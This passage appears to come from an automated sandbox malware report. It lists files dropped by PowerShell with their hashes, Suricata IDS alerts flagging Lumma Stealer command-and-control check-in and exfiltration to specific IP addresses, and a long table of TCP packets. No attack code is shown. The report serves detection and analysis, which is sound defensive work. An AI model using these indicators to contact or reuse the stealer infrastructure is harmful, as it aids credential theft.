                                                                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1300
                                                                                                                                            Entropy (8bit):5.397535305912226
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:3JytZWSKco4KmM6GjKbm51s4RPQoUebIKo+mZ9t7J0gt/NK3R8QHr8H+:5yjWSU4YymI4RIoUeW+mZ9tK8NWR8QHJ
                                                                                                                                            MD5:E028E07AC49CA4FD6CB4F8E23D6A5021
                                                                                                                                            SHA1:8E4F19F9A6096E7EF222CC0F1C30622BFD5B346B
                                                                                                                                            SHA-256:8CCD09E761E1CC4FD927F1833EAF6DCB61546067E155AD7065090BD9A091BE97
                                                                                                                                            SHA-512:98E6D44A8375D60B4CA942AF54CEB0DB6E2E387629B14059E0EBB28B458306C18038DB4B426E429E01BF77DA2FA84000CD24006B0288DD80B4DCF6924FBE1F9C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfgw41fq.42d.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pziobvie.pow.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2wdiptt.5ji.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1plfcxf.wka.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            Static File Info

                                                                                                                                            No static file info

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-12-21T20:15:17.320337+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449820172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:29.277426+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449820172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:29.277426+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449820172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:30.559614+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449821172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:31.626648+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449821172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:31.626648+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449821172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:33.167030+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449822172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:35.427327+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449823172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:37.627879+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449824172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:39.914752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449825172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:42.264208+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449826172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:43.119694+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449826172.67.151.193443TCP
                                                                                                                                            2024-12-21T20:15:43.815217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449827172.67.151.193443TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 21, 2024 20:13:31.188186884 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:31.188225985 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:31.188292980 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:31.201715946 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:31.201730967 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:32.421503067 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:32.421679020 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:32.471282959 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:32.471302032 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:32.471673965 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:32.472493887 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:32.476741076 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:32.523323059 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:33.101566076 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:33.101619959 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:33.101638079 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:33.101659060 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:33.158402920 CET49732443192.168.2.4172.67.131.114
                                                                                                                                            Dec 21, 2024 20:13:33.158430099 CET44349732172.67.131.114192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:33.804059029 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:33.804184914 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:33.804301023 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:33.804723978 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:33.804800034 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.023802996 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.023999929 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.029371023 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.029427052 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.029680967 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.029858112 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.030174971 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.075330973 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.608128071 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.608393908 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.608402967 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.608469009 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.608850002 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.609277010 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.609466076 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.609527111 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.609771967 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.609946966 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.610050917 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.616763115 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.616961002 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.617023945 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.617105961 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.625426054 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.625930071 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.633672953 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.633929014 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.730498075 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.731412888 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.731475115 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.732325077 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.800286055 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.803407907 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.803468943 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.803524017 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.811188936 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.811448097 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.811508894 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.815376997 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.819838047 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.823353052 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.823412895 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.827337027 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.828123093 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.828305960 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.828399897 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.828459978 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.836605072 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.837182999 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.845175982 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.847337961 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.847399950 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.851423025 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.853679895 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.853897095 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.853959084 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.855299950 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.862109900 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.862313032 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.862375021 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.862454891 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.870481968 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.870713949 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.870774984 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.871380091 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.879112959 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.879410028 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.885689020 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.887309074 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.887391090 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.887438059 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.992476940 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.992628098 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.995944023 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.996151924 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:35.996252060 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:35.996309996 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.002758026 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.003082037 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.003144026 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.003237009 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.009489059 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.009696007 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.009757996 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.009839058 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.016220093 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.016300917 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.023277998 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.027344942 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.029841900 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.030042887 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.043265104 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.043382883 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.049985886 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.050144911 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.062306881 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.062396049 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.067831039 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.068022966 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.078516006 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.078589916 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.089225054 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.089405060 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.187603951 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.187819958 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.197287083 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.197489023 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.207928896 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.208146095 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.213402033 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.213577032 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.224081993 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.224277020 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.229610920 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.229814053 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.240572929 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.240658045 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.251146078 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.251254082 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.259704113 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.259892941 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.263917923 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.264143944 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.272243023 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.272418022 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.276674986 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.276740074 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.284828901 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.284908056 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.293167114 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.293251038 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.299757004 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.299951077 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.307769060 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.308029890 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.316078901 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.316242933 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.320468903 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.320664883 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.329054117 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.329130888 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.333368063 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.333444118 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.377042055 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.377120972 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.381403923 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.381458998 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.388278961 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.388335943 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.395381927 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.395442963 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.402189970 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.402254105 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.405879974 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.405946970 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.412962914 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.413028955 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.438441038 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.438505888 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.443360090 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.443444014 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.449750900 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.449955940 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.453846931 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.454101086 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.455682039 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.455753088 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.459105968 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.459306955 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.467319012 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.467324972 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.467359066 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.467421055 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.467422009 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.467487097 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.467565060 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.477806091 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.477832079 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.478014946 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.478014946 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.478080034 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.478147030 CET49733443192.168.2.4104.21.18.182
                                                                                                                                            Dec 21, 2024 20:13:36.489216089 CET44349733104.21.18.182192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:36.489228964 CET44349733104.21.18.182192.168.2.4
